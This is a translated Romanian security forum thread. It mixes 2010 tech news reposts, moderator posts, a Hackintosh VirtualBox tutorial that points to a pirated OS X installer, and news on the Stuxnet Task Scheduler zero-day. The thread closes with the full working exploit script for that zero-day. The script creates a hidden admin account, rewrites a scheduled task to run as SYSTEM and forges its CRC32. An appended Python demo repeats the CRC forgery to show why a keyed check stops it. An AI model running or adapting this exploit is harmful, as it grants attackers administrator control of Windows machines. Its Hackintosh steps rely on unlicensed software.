As we announced yesterday, Google has officially launched the beta test version of the Chrome operating system, together with a new notebook for it to run on. Google Chrome OS was conceived as a platform that merges the operating system on the computer with the Internet: the user no longer needs to run programs directly from the computer, but can run them online, on the Web. By creating independent programs, Google ensures that all applications and files of any type will always be backed up and available anywhere and anytime, since Chrome OS will itself be available regardless of where the user is. So the possibilities are unlimited, all the more so since there is also the Chrome Web Store, which offers both paid and free applications.

As for the hardware on which Chrome OS will initially run, we admit that Google managed to surprise us in a pleasant way. The Cr-48 notebook has a 12-inch screen, a full-size keyboard and a generous clickpad. The processor is a Qualcomm Gobi 3G, and the battery lasts up to 8 hours. What surprised us was the fact that Google chose not to brand the notebook with any make or logo, wrapping it in a totally unattractive design. Perhaps, at least this time, Google wasn't aiming for image and looks, focusing instead on more important things. We can only assume that the Internet giant wanted to send us a message this way, namely that it does not want to be a competitor to hardware developers. Further proof of this could be the fact that Google chose not to sell this laptop, but to distribute it free of charge through a program called Chrome OS Pilot. To sign up for the beta program, you can apply here.

Since the number of units of this laptop is limited, you will most likely have to wait until the middle of next year, when the models from Samsung and Acer will appear, which will surely be far more attractive.

Source: Google se afiseaza cu noul Chrome OS si notebook-ul aferent | Hit.ro
-
The most powerful AMD Phenom six-core and dual-core processors
by Laurentiu Crisu | 8 December 2010

AMD has launched two new Black Edition desktop processor models, one of them being the top of the range of the six-core series, AMD Phenom II X6. These processors join the AMD 8 series of chipsets, as well as the recently launched ATI Radeon HD 6000 series of graphics cards, which offer a novel 3D experience with GPU-accelerated multimedia performance. The AMD Phenom II X6 1100T processor is the new top of the range for AMD desktop processors, offering top features such as unlocked clock multipliers, Turbo CORE technology and six-core performance. The AMD Phenom II X2 565 Black Edition processor is an affordable alternative for enthusiasts looking for the ability to customize performance at incredible speeds. The ever-growing demands of HD and 3D media content have set a new standard for the visual experience. The versatility of computers with VISION technology creates unlimited possibilities for users, such as Internet-oriented video entertainment, creating photo and video content, running the most demanding PC games and improving multitasking performance. Users looking for a new PC that combines the value of multi-core performance, multiple PC platform options, HD video content and 3D graphics can opt for a computer with VISION technology from AMD.

Source: Cele mai puternice procesoare AMD Phenom cu sase si doua nuclee | Hit.ro
-
Internet Explorer 9 introduces a Web anti-tracking tool
by Cristina Enescu | 8 December 2010

Microsoft's IE9 browser will have tools that restrict the collection of data about the user's online activity, thus preventing the sites visited from sharing information about that activity on the Web. The news comes amid criticism from the United States government of the computer industry over slow progress in protecting user privacy. In a blog post, Microsoft said that people don't realize that when they visit a site, information about what they search for or buy often ends up in the hands of other companies, without users being notified. With IE9, Microsoft plans to introduce what it calls a "Tracking Protection List", which, according to the company, behaves like the "Do Not Call" list that limits the number of people who can be called by marketing firms. Users will be able to create lists through which their data can be shared only on the sites they themselves choose. When turned on, the system could prevent certain ads or other features from being displayed when users visit those sites. Anyone will be able to write a list and share it with others so they get the same protection, Microsoft said. The company also plans to release the formats and standards for the lists under a free license, so that they can be adopted by other browsers as well. Microsoft added that the first versions of these new features will be included in IE9, scheduled for release at the beginning of 2011.

Source: Internet Explorer 9 introduce instrumentul anti-tracking pe Web | Hit.ro
-
I have noticed there are some problems with the activation email for newly created accounts. If you created an account and did not receive the activation email, send me a PM and it will be sorted out. I will not resend an activation email; I will activate the account myself.
-
You don't have to read all of them, that would be absurd; everyone should read whatever interests them.
-
How to Run Mac OS X in VirtualBox on Windows Author: Bobby Patton Source: How to Run Mac OS X in VirtualBox on Windows We've shown you how to install Snow Leopard in VMWare, but if you haven't purchased VMWare, you can now do it using the previously mentioned free program VirtualBox. Apart from VirtualBox, you'll also need an OSX86 ISO. The group Hazard has put out a good patched Snow Leopard installer that should do fine (just search for it on Google). Of course, if you feel bad about downloading the ISO of Snow Leopard, you could always go buy a copy to feel a bit better, karmically. After you have them both, install VirtualBox. Open up VirtualBox and click on New at the top left. At the Create New Virtual Machine window, click Next. At this window type OSX as the name and it will automatically change the system and version. The next window will let you choose your RAM amount: if you can spare it, crank it up as far as you can go, but 1024MB should be sufficient. This is where you'll make your hard disk. 20GB should be enough, so what it comes down to is dynamic or static. Dynamic will expand on use and static will be a fixed 20GB no matter how much data is actually in it. Dynamic is better for not taking up your hard drive, but static should give you better performance. I normally use dynamic. Click Next unless you want to change it from dynamic, or if you want to increase the disk size or change the file location. It will show a summary of your settings. Click Finish, then click Settings at the top. At this window click on System in the left pane and uncheck Enable EFI. Now click on the Storage button on the left. From there click on Empty under the OSX.vdi, then click the folder with the green arrow on the right (next to "CD/DVD Device"). At this window click the Add button at the top. Then find and add the OSX86 ISO you downloaded earlier. Then highlight it and click Select at the bottom. Then click OK, and hit the Start button on the left side of the main VirtualBox window.
As it starts up, click inside the window and hit F8. Then at the boot: prompt type -v so you can see what exactly went wrong if something does go wrong. All the services will run and eventually you should come to the language screen. Choose your language then click Next. If you are unable to move your mouse around then hit Right-Ctrl + I. Click Continue and Agree. Next, start up Disk Utility by going to Utilities in the menu bar. At this screen highlight 20GB VBOX HARDDISK. Then click the Erase tab, name it what you want in the name box and click the Erase button on the bottom right of the window. It shouldn't take long. Then click Disk Utility in your menu bar and quit it. Now you're back at the installer. Highlight the drive that is now showing up and click Continue. The next window is important. Click the Customize button on the bottom left. AMD users check: any updates included at the top. Drop down Kernels and choose Legacy kernel. AMD option below System support. Intel users check: any updates included at the top. Drop down Bootloaders and check the newest Chameleon. Drop down Kernels and choose Legacy kernel. Then click Done and hit the Install button. To speed up the process you can click Skip when the disc check pops up. As soon as it says "installation finished" and starts counting down to restart, press the right Ctrl key. Click on Devices at the top of the VirtualBox window, hit CD/DVD Devices and click Unmount CD/DVD Device. Then go to Machine > Reset and click Reset at the prompt. Next you'll see the Chameleon loader and then OS X will begin to boot. After it boots you will see the setup screens for OS X! You're good to go. The only hiccup I've found is that it can only be virtualized with one core. It could be the OSX disc I was using or it might not be. And I have yet to find the right kext that will allow audio to work, and the resolution is limited also. But other than that you'll have a fully functioning OSX virtualized!
Update: I'd like to post some answers to the resolution and audio. I should have looked around before posting this but I just didn't have the time. So anyways, here's what you can do: To fix the resolution issue, open Finder and go to the OS X drive on the left. Open the folder called Extras. Right-click on the file com.Apple.Boot.plist and open it with TextEdit. Under the first insert this: Graphics Mode 1280x1024x32 or another compatible resolution. Select "Save As" at the top and save it to the desktop, unchecking the check under Unicode, and then save it as com.apple.boot.plist. After that drag and drop it into the Extras folder and overwrite the original file, entering your password when prompted. Instructions for the sound issue can be found here. Don't install system updates. If you want updates you'll have to install another ISO distribution with the updates on it. If you install the updates directly from Apple it messes with the custom kexts and Chameleon. Just a forewarning. And for those of you getting boot issues, try choosing a different version of Chameleon or a different kernel. Sometimes that seems to help. And if you're getting one of the USB errors then try disabling USB in the VirtualBox settings and see if that helps. Tek411: OSX in Virtual Box (Hackintoshed VM)
-
Screw recaptcha. Anything but that.
-
Vim and Emacs suck. I like Notepad++, Gedit and Kwrite.
-
Google, Microsoft, NASA and Yahoo organize a legal hacking competition
Nytro replied to Nytro's topic in Stiri securitate
People still think hackers are loners cut off from the world, working in the basement of a house with no connection to the outside world; sad.
-
Both of you are banned for 2 days, so you can calm down.
-
Google, Microsoft, NASA and Yahoo organize a legal hacking competition, by Laurentiu Crisu | 3 December 2010. This week the second edition of the Random Hacks of Kindness (RHoK) competition takes place; it will be held in several cities around the world and will bring hackers and some of the best software engineers to the same side of the barricade. The event, hosted by Google, Microsoft, Yahoo, NASA and the World Bank, will take place on 4-6 December 2010 and aims to use technology to make the world a better place by building a community of innovation. The “hackathon”, as its organizers have called it, brings together the most talented hackers from all corners of the world, software developers and computer experts, who dedicate their time to solving real-world problems. At the end of the two days of competition, an application will select the team that deserves the title of “RHoKstars”. The winning hacks from the first edition of this competition were used to provide emergency assistance during the earthquakes in Haiti and Chile. “The event gives hackers the opportunity to use their skills for noble purposes, under the guidance of experts who understand real-life challenges,” said Todd Khozein, a representative of RHoK. Unfortunately, no city in Romania will host this contest. For those who do want to participate, the closest location to our country would be Berlin, Germany. Source: Google, Microsoft, NASA si Yahoo organizeaza competitia de hacking legal | Hit.ro
-
The simple version is much faster: you have only one comparison and one assignment, not a pile of calculations. In addition, you call 2 functions, and function calls consume both resources (stack) and processor time (returning from the function...). But that only matters if you make millions of calls to the max function.
-
Without Java or Flash, files can be downloaded by someone else while they are still being uploaded... http://ge.tt/
-
1) How does that help you? 2) There are questions that never get any answer, ever; do you have that much patience? Why wouldn't a question get answered? 3) What's the point, are we learning to count? Stupid ideas.
-
As you can see, the Offtopic category is very heavily visited, because all sorts of things get posted there, more or less useful. The problem arises when things that belong elsewhere get posted there too, most often requests for various things and requests for help with various problems. These topics have special categories to be posted in, "Cereri" and "Ajutor". I don't see why everything should be posted in "Offtopic". That section is for posts that don't fit into any other category. Of course, I think the chances of getting an answer in "Offtopic" are greater than in the proper place, because it's a more visited category, but that way it will turn into a madhouse. As some of you have noticed, if you post in the wrong category (not only in "Offtopic") you will receive a warning. So, before opening a topic, read the names of the categories, and their descriptions if you haven't understood what gets posted in them. Indeed, if you want to post a tutorial about programming, I won't penalize you if you choose to post it in "Tutoriale Romana/Engleza" or "Programare", for the simple reason that it fits both categories and, moreover, is something useful that helps the forum's members. But if you post all kinds of nonsense in the wrong places you will be warned. Once again, a little attention before posting.
-
You probably send 20 emails with istealer too, to steal some messenger passwords... Don't worry, nobody is going to pay any attention to you. Yes, if someone steals your wallet you want them to go to prison; if someone steals the money from your account, why shouldn't they go to prison? In fact you would deserve to fill the prisons; at least those who steal wallets "work" to get them, while you take 2 programs you don't even understand and that's it, you're hackers with money. Nobody looks at a few hundred euros; if you were a smart guy and made more, I'd be posting a news story about you right now, but I'm sure that won't be the case.
-
"""Hacker""" Gets 18 Months in U.K. Prison. Better said: "Loser". Good, we got rid of another thief. Prison for everyone like him; off to work, not to beg. A Scottish man was sentenced today to 18 months in prison for spamming out e-mails laced with malware and stealing data. A 33-year-old Scottish man was sentenced today to 18 months in prison in the U.K. for spamming out malware-infected e-mails and stealing data. The sentencing today of Matthew Anderson of Drummuir, Aberdeenshire, Scotland, brought an end to an investigation first launched four years ago. According to the Metropolitan Police Service (MPS), Anderson was part of a ring that targeted hundreds of businesses in the U.K. with malware starting in 2005. The conspiracy was operated by members of a cyber-crew called m00p that spammed out millions of e-mails laced with malware, authorities said. It was Anderson's job to manage the operation by composing the e-mails and distributing them with virus attachments, police said. The malware allowed Anderson to access private data stored on computers without the knowledge of the computer's owner, according to police. "This organized online criminal network infected huge numbers of computers around the world, especially targeting U.K. businesses and individuals," said Detective Constable Bob Burls, from the MPS Central e-Crime Unit, in a statement. "Matthew Anderson methodically exploited computer users not only for his own financial gain but also violating their privacy. They used sophisticated computer code to commit their crimes." The investigation resulted in the arrests of three men, including Anderson, on June 27, 2006. No charges were filed against one of the men, while the other pleaded guilty in 2008, according to reports. According to police, a number of computers were seized at residential addresses in both countries, in addition to the suspects' servers, as part of the investigation.
When online, Anderson used the profile names "aobuluz" and "warpigs," authorities said, and operated his illegal business behind the front of an online company called Optom Security that offered security software. Among the evidence police found were screenshots on Anderson's computers taken from other people's Webcams, as well as copies of wills, medical reports, password lists and other content, police said. "The Internet means criminals have increased opportunities to commit crime internationally; however, I'd like to reassure the public that the international law enforcement and antivirus companies' response is increasingly sophisticated," Burls said. "As this case shows, criminals can't hide online and are being held to account for their actions. A complex investigation like this demonstrates what international cooperation can achieve." Source: Hacker Gets 18 Months in U.K. Prison - Security - News & Reviews
-
Exploit code for one of the zero-day vulnerabilities exploited by Stuxnet Exploit code for one of the zero-day vulnerabilities exploited by the Stuxnet worm has made its way online. The code exploits a Windows Task Scheduler vulnerability, and can be used to escalate privileges. The exploit code was added to the Exploit Database operated by Offensive Security Nov. 20. There is no patch currently available for the flaw, though Microsoft said one is forthcoming. “Microsoft is aware of the public posting of the details of an Elevation of Privilege vulnerability used by the Stuxnet malware,” Jerry Bryant, group manager of Response Communications at Microsoft, said in a statement. “We first discussed this vulnerability in September 2010. Because this is a local Elevation-of-Privilege issue, it requires attackers to be already able to execute code on a targeted machine. A bulletin addressing this issue will be released as part of our regular monthly bulletin cycle in the near future.” The vulnerability was one of four zero-days used by the malware in its bid to compromise industrial control systems. The three others have all been patched since the worm was discovered this summer. Researchers have spent the last several months trying to get to the bottom of the Stuxnet worm. Just recently, Symantec reported evidence that it targets frequency converter drives used to control the speed of motors, and that the actual goal of the worm may be to disrupt nuclear programs. In particular, speculation has focused on Iran as a possible target, as it has been the site of many of Stuxnet's infections. Among the other zero-days Stuxnet has been observed using are the .LNK shortcut vulnerability, patched in August; a vulnerability in the Windows Print Spooler service (MS10-061), patched in September; and another privilege escalation issue (MS10-073), patched in a massive update in October. 
Early versions of the worm also spread without a vulnerability at all, instead abusing the AutoRun feature (see: How Stuxnet Malware Used AutoRun Trick to Infect PCs - Security - News & Reviews) to compromise machines through infected USB devices. Source: Exploit Code for Windows Zero-Day Targeted by Stuxnet Goes Public - Security - News & Reviews
-
Windows Task Scheduler Privilege Escalation 0day

# Exploit Title: Windows Task Scheduler Privilege Escalation 0day
# Date: 20-11-2010
# Author: webDEViL
# Tested on: Windows 7/2008 x86/x64

<job id="tasksch-wD-0day">
<script language="Javascript">
crc_table = new Array(
    0x00000000, 0x77073096, 0xEE0E612C, 0x990951BA, 0x076DC419, 0x706AF48F, 0xE963A535, 0x9E6495A3,
    0x0EDB8832, 0x79DCB8A4, 0xE0D5E91E, 0x97D2D988, 0x09B64C2B, 0x7EB17CBD, 0xE7B82D07, 0x90BF1D91,
    0x1DB71064, 0x6AB020F2, 0xF3B97148, 0x84BE41DE, 0x1ADAD47D, 0x6DDDE4EB, 0xF4D4B551, 0x83D385C7,
    0x136C9856, 0x646BA8C0, 0xFD62F97A, 0x8A65C9EC, 0x14015C4F, 0x63066CD9, 0xFA0F3D63, 0x8D080DF5,
    0x3B6E20C8, 0x4C69105E, 0xD56041E4, 0xA2677172, 0x3C03E4D1, 0x4B04D447, 0xD20D85FD, 0xA50AB56B,
    0x35B5A8FA, 0x42B2986C, 0xDBBBC9D6, 0xACBCF940, 0x32D86CE3, 0x45DF5C75, 0xDCD60DCF, 0xABD13D59,
    0x26D930AC, 0x51DE003A, 0xC8D75180, 0xBFD06116, 0x21B4F4B5, 0x56B3C423, 0xCFBA9599, 0xB8BDA50F,
    0x2802B89E, 0x5F058808, 0xC60CD9B2, 0xB10BE924, 0x2F6F7C87, 0x58684C11, 0xC1611DAB, 0xB6662D3D,
    0x76DC4190, 0x01DB7106, 0x98D220BC, 0xEFD5102A, 0x71B18589, 0x06B6B51F, 0x9FBFE4A5, 0xE8B8D433,
    0x7807C9A2, 0x0F00F934, 0x9609A88E, 0xE10E9818, 0x7F6A0DBB, 0x086D3D2D, 0x91646C97, 0xE6635C01,
    0x6B6B51F4, 0x1C6C6162, 0x856530D8, 0xF262004E, 0x6C0695ED, 0x1B01A57B, 0x8208F4C1, 0xF50FC457,
    0x65B0D9C6, 0x12B7E950, 0x8BBEB8EA, 0xFCB9887C, 0x62DD1DDF, 0x15DA2D49, 0x8CD37CF3, 0xFBD44C65,
    0x4DB26158, 0x3AB551CE, 0xA3BC0074, 0xD4BB30E2, 0x4ADFA541, 0x3DD895D7, 0xA4D1C46D, 0xD3D6F4FB,
    0x4369E96A, 0x346ED9FC, 0xAD678846, 0xDA60B8D0, 0x44042D73, 0x33031DE5, 0xAA0A4C5F, 0xDD0D7CC9,
    0x5005713C, 0x270241AA, 0xBE0B1010, 0xC90C2086, 0x5768B525, 0x206F85B3, 0xB966D409, 0xCE61E49F,
    0x5EDEF90E, 0x29D9C998, 0xB0D09822, 0xC7D7A8B4, 0x59B33D17, 0x2EB40D81, 0xB7BD5C3B, 0xC0BA6CAD,
    0xEDB88320, 0x9ABFB3B6, 0x03B6E20C, 0x74B1D29A, 0xEAD54739, 0x9DD277AF, 0x04DB2615, 0x73DC1683,
    0xE3630B12, 0x94643B84, 0x0D6D6A3E, 0x7A6A5AA8, 0xE40ECF0B, 0x9309FF9D, 0x0A00AE27, 0x7D079EB1,
    0xF00F9344, 0x8708A3D2, 0x1E01F268, 0x6906C2FE, 0xF762575D, 0x806567CB, 0x196C3671, 0x6E6B06E7,
    0xFED41B76, 0x89D32BE0, 0x10DA7A5A, 0x67DD4ACC, 0xF9B9DF6F, 0x8EBEEFF9, 0x17B7BE43, 0x60B08ED5,
    0xD6D6A3E8, 0xA1D1937E, 0x38D8C2C4, 0x4FDFF252, 0xD1BB67F1, 0xA6BC5767, 0x3FB506DD, 0x48B2364B,
    0xD80D2BDA, 0xAF0A1B4C, 0x36034AF6, 0x41047A60, 0xDF60EFC3, 0xA867DF55, 0x316E8EEF, 0x4669BE79,
    0xCB61B38C, 0xBC66831A, 0x256FD2A0, 0x5268E236, 0xCC0C7795, 0xBB0B4703, 0x220216B9, 0x5505262F,
    0xC5BA3BBE, 0xB2BD0B28, 0x2BB45A92, 0x5CB36A04, 0xC2D7FFA7, 0xB5D0CF31, 0x2CD99E8B, 0x5BDEAE1D,
    0x9B64C2B0, 0xEC63F226, 0x756AA39C, 0x026D930A, 0x9C0906A9, 0xEB0E363F, 0x72076785, 0x05005713,
    0x95BF4A82, 0xE2B87A14, 0x7BB12BAE, 0x0CB61B38, 0x92D28E9B, 0xE5D5BE0D, 0x7CDCEFB7, 0x0BDBDF21,
    0x86D3D2D4, 0xF1D4E242, 0x68DDB3F8, 0x1FDA836E, 0x81BE16CD, 0xF6B9265B, 0x6FB077E1, 0x18B74777,
    0x88085AE6, 0xFF0F6A70, 0x66063BCA, 0x11010B5C, 0x8F659EFF, 0xF862AE69, 0x616BFFD3, 0x166CCF45,
    0xA00AE278, 0xD70DD2EE, 0x4E048354, 0x3903B3C2, 0xA7672661, 0xD06016F7, 0x4969474D, 0x3E6E77DB,
    0xAED16A4A, 0xD9D65ADC, 0x40DF0B66, 0x37D83BF0, 0xA9BCAE53, 0xDEBB9EC5, 0x47B2CF7F, 0x30B5FFE9,
    0xBDBDF21C, 0xCABAC28A, 0x53B39330, 0x24B4A3A6, 0xBAD03605, 0xCDD70693, 0x54DE5729, 0x23D967BF,
    0xB3667A2E, 0xC4614AB8, 0x5D681B02, 0x2A6F2B94, 0xB40BBE37, 0xC30C8EA1, 0x5A05DF1B, 0x2D02EF8D
);

var hD='0123456789ABCDEF';

function dec2hex(d) {
    h='';
    for (i=0;i<8;i++) {
        h = hD.charAt(d&15)+h;
        d >>>= 4;
    }
    return h;
}

function encodeToHex(str){
    var r="";
    var e=str.length;
    var c=0;
    var h;
    while(c<e){
        h=str.charCodeAt(c++).toString(16);
        while(h.length<3) h="0"+h;
        r+=h;
    }
    return r;
}

function decodeFromHex(str){
    var r="";
    var e=str.length;
    var s=0;
    while(e>1){
        r=r+String.fromCharCode("0x"+str.substring(s,s+2));
        s=s+2;
        e=e-2;
    }
    return r;
}

function calc_crc(anyForm) {
    anyTextString=decodeFromHex(anyForm);
    Crc_value = 0xFFFFFFFF;
    StringLength=anyTextString.length;
    for (i=0; i<StringLength; i++) {
        tableIndex = (anyTextString.charCodeAt(i) ^ Crc_value) & 0xFF;
        Table_value = crc_table[tableIndex];
        Crc_value >>>= 8;
        Crc_value ^= Table_value;
    }
    Crc_value ^= 0xFFFFFFFF;
    return dec2hex(Crc_value);
}

function rev_crc(leadString,endString,crc32) {
    //
    // First, we calculate the CRC-32 for the initial string
    //
    anyTextString=decodeFromHex(leadString);
    Crc_value = 0xFFFFFFFF;
    StringLength=anyTextString.length;
    //document.write(alert(StringLength));
    for (var i=0; i<StringLength; i++) {
        tableIndex = (anyTextString.charCodeAt(i) ^ Crc_value) & 0xFF;
        Table_value = crc_table[tableIndex];
        Crc_value >>>= 8;
        Crc_value ^= Table_value;
    }
    //
    // Second, we calculate the CRC-32 without the final string
    //
    crc=parseInt(crc32,16);
    crc ^= 0xFFFFFFFF;
    anyTextString=decodeFromHex(endString);
    StringLength=anyTextString.length;
    for (var i=0; i<StringLength; i++) {
        tableIndex=0;
        Table_value = crc_table[tableIndex];
        while (((Table_value ^ crc) >>> 24) & 0xFF) {
            tableIndex++;
            Table_value = crc_table[tableIndex];
        }
        crc ^= Table_value;
        crc <<= 8;
        crc |= tableIndex ^ anyTextString.charCodeAt(StringLength - i -1);
    }
    //
    // Now let's find the 4-byte string
    //
    for (var i=0; i<4; i++) {
        tableIndex=0;
        Table_value = crc_table[tableIndex];
        while (((Table_value ^ crc) >>> 24) & 0xFF) {
            tableIndex++;
            Table_value = crc_table[tableIndex];
        }
        crc ^= Table_value;
        crc <<= 8;
        crc |= tableIndex;
    }
    crc ^= Crc_value;
    //
    // Finally, display the results
    //
    var TextString=dec2hex(crc);
    var Teststring='';
    Teststring=TextString.substring(6,8);
    Teststring+=TextString.substring(4,6);
    Teststring+=TextString.substring(2,4);
    Teststring+=TextString.substring(0,2);
    return Teststring
}

function decodeFromHex(str){
    var r="";
    var e=str.length;
    var s=0;
    while(e>1){
        r=r+String.fromCharCode("0x"+str.substring(s,s+2));
        s=s+2;
        e=e-2;
    }
    return r;
}
</script>

<script language="VBScript">
dim output
set output = wscript.stdout
output.writeline " Task Scheduler 0 day - Privilege Escalation "
output.writeline " Should work on Vista/Win7/2008 x86/x64"
output.writeline " webDEViL - w3bd3vil [at] gmail [dot] com" & vbCr & vbLf

biatchFile = WScript.CreateObject("Scripting.FileSystemObject").GetSpecialFolder(2)+"\xpl.bat"
Set objShell = CreateObject("WScript.Shell")
objShell.Run "schtasks /create /TN wDw00t /sc monthly /tr """+biatchFile+"""",,True
Set fso = CreateObject("Scripting.FileSystemObject")
Set a = fso.CreateTextFile(biatchFile, True)
a.WriteLine ("net user /add test123 test123")
a.WriteLine ("net localgroup administrators /add test123")
a.WriteLine ("schtasks /delete /f /TN wDw00t")

Function ReadByteArray(strFileName)
    Const adTypeBinary = 1
    Dim bin
    Set bin = CreateObject("ADODB.Stream")
    bin.Type = adTypeBinary
    bin.Open
    bin.LoadFromFile strFileName
    ReadByteArray = bin.Read
    'output.writeline ReadByteArray
End Function

Function OctetToHexStr (arrbytOctet)
    Dim k
    OctetToHexStr = ""
    For k = 3 To Lenb (arrbytOctet)
        OctetToHexStr = OctetToHexStr _
            & Right("0" & Hex(Ascb(Midb(arrbytOctet, k, 1))), 2)
    Next
End Function

strFileName="C:\windows\system32\tasks\wDw00t"
hexXML = OctetToHexStr (ReadByteArray(strFileName))
'output.writeline hexXML
crc32 = calc_crc(hexXML)
output.writeline "Crc32 Original: "+crc32

Set xmlDoc = CreateObject("Microsoft.XMLDOM")
'permissions workaround
'objShell.Run "cmd /c copy C:\windows\system32\tasks\wDw00t .",,True
'objShell.Run "cmd /c schtasks /query /XML /TN wDw00t > wDw00t.xml",,True
Set objShell = WScript.CreateObject("WScript.Shell")
Set objExecObject = objShell.Exec("cmd /c schtasks /query /XML /TN wDw00t")
Do Until objExecObject.StdOut.AtEndOfStream
    strLine = strLine & objExecObject.StdOut.ReadLine()
Loop
hexXML = "FFFE3C00"+OctetToHexStr(strLine)
'output.writeline hexXML
Set ts = fso.createtextfile ("wDw00t.xml")
For n = 1 To (Len (hexXML) - 1) step 2
    ts.write Chr ("&h" & Mid (hexXML, n, 2))
Next
ts.close

xmlDoc.load "wDw00t.xml"
Set Author = xmlDoc.selectsinglenode ("//Task/RegistrationInfo/Author")
Author.text = "LocalSystem"
Set UserId = xmlDoc.selectsinglenode ("//Task/Principals/Principal/UserId")
UserId.text = "S-1-5-18"
xmldoc.save(strFileName)

hexXML = OctetToHexStr (ReadByteArray(strFileName))
leadString=hexXML+"3C0021002D002D00"
endString="2D002D003E00"
'output.writeline leadString
impbytes=rev_crc(leadString,endString,crc32)
output.writeline "Crc32 Magic Bytes: "+impbytes
finalString = leadString+impbytes+endString
forge = calc_crc(finalString)
output.writeline "Crc32 Forged: "+forge

strHexString="FFFE"+finalString
Set fso = CreateObject ("scripting.filesystemobject")
Set stream = CreateObject ("adodb.stream")
Set ts = fso.createtextfile (strFileName)
For n = 1 To (Len (strHexString) - 1) step 2
    ts.write Chr ("&h" & Mid (strHexString, n, 2))
Next
ts.close

Set objShell = CreateObject("WScript.Shell")
objShell.Run "schtasks /change /TN wDw00t /disable",,True
objShell.Run "schtasks /change /TN wDw00t /enable",,True
objShell.Run "schtasks /run /TN wDw00t",,True
</script>
</job>

This is the exploit used by the Stuxnet worm. Source: Windows Task Scheduler Privilege Escalation 0day
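The root cause behind the exploit above is that the task file's integrity was guarded by an unkeyed CRC32, which the rev_crc() routine defeats with four free bytes hidden in a trailing XML comment. The Python below is an added example, not part of the original exploit or webDEViL's code: it reproduces that forgery step generically (same construction as rev_crc, UTF-16LE framing and little-endian patch bytes as on the page) on a constructed stand-in task file, and then shows that a keyed HMAC over the same bytes catches the edit that the CRC check waves through.

```python
import hashlib
import hmac
import zlib


def _make_table():
    """Standard reflected CRC-32 table (the same table the exploit's JavaScript carries inline)."""
    table = []
    for n in range(256):
        c = n
        for _ in range(8):
            c = (c >> 1) ^ 0xEDB88320 if c & 1 else c >> 1
        table.append(c)
    return table


_TABLE = _make_table()
# Each table entry has a distinct top byte, so the top byte of a register identifies
# the table index that produced it; this is what makes the CRC step invertible.
_INDEX_BY_TOP = {t >> 24: i for i, t in enumerate(_TABLE)}


def forge_crc32(prefix: bytes, suffix: bytes, target: int) -> bytes:
    """Return 4 bytes X such that zlib.crc32(prefix + X + suffix) == target.

    Run the CRC register forward over the prefix, run it backward from the
    target over the suffix and then over four unknown bytes (taken as zero);
    the XOR of the two registers is X, least-significant byte first.
    """
    forward = zlib.crc32(prefix) ^ 0xFFFFFFFF   # register after the prefix
    reg = target ^ 0xFFFFFFFF                   # register required after the suffix
    for b in reversed(suffix):                  # undo the suffix one byte at a time
        i = _INDEX_BY_TOP[reg >> 24]
        reg = (((reg ^ _TABLE[i]) << 8) & 0xFFFFFFFF) | (i ^ b)
    for _ in range(4):                          # undo the four unknown bytes
        i = _INDEX_BY_TOP[reg >> 24]
        reg = (((reg ^ _TABLE[i]) << 8) & 0xFFFFFFFF) | i
    return ((forward ^ reg) & 0xFFFFFFFF).to_bytes(4, "little")


# Constructed stand-in for a registered task file (real ones are UTF-16LE with a BOM).
ORIGINAL_XML = (
    '<?xml version="1.0" encoding="UTF-16"?>'
    '<Task version="1.2"><RegistrationInfo><Author>PC\\user</Author></RegistrationInfo>'
    '<Principals><Principal id="Author"><UserId>PC\\user</UserId></Principal></Principals>'
    '<Actions><Exec><Command>notepad.exe</Command></Exec></Actions></Task>'
)
ORIGINAL = b"\xff\xfe" + ORIGINAL_XML.encode("utf-16-le")


def tamper_keeping_crc(original: bytes, old: str, new: str) -> bytes:
    """Replace a UTF-16LE string in the file and append an XML comment whose four
    payload bytes bring the CRC32 of the whole file back to the original value."""
    target = zlib.crc32(original)
    body = original.replace(old.encode("utf-16-le"), new.encode("utf-16-le"))
    head = body + "<!--".encode("utf-16-le")
    tail = "-->".encode("utf-16-le")
    return head + forge_crc32(head, tail, target) + tail


def crc_check_passes(reference: bytes, candidate: bytes) -> bool:
    """The kind of check the vulnerable service relied on: an unkeyed CRC32 comparison."""
    return zlib.crc32(reference) == zlib.crc32(candidate)


def hmac_check_passes(key: bytes, reference: bytes, candidate: bytes) -> bool:
    """A keyed check over the same bytes: without the key no fix-up bytes can be computed."""
    expected = hmac.new(key, reference, hashlib.sha256).digest()
    actual = hmac.new(key, candidate, hashlib.sha256).digest()
    return hmac.compare_digest(expected, actual)


if __name__ == "__main__":
    tampered = tamper_keeping_crc(ORIGINAL, "PC\\user", "LocalSystem")
    print("content changed:", tampered != ORIGINAL)
    print("CRC32 check passes:", crc_check_passes(ORIGINAL, tampered))
    print("HMAC check passes:", hmac_check_passes(b"constructed-key", ORIGINAL, tampered))
```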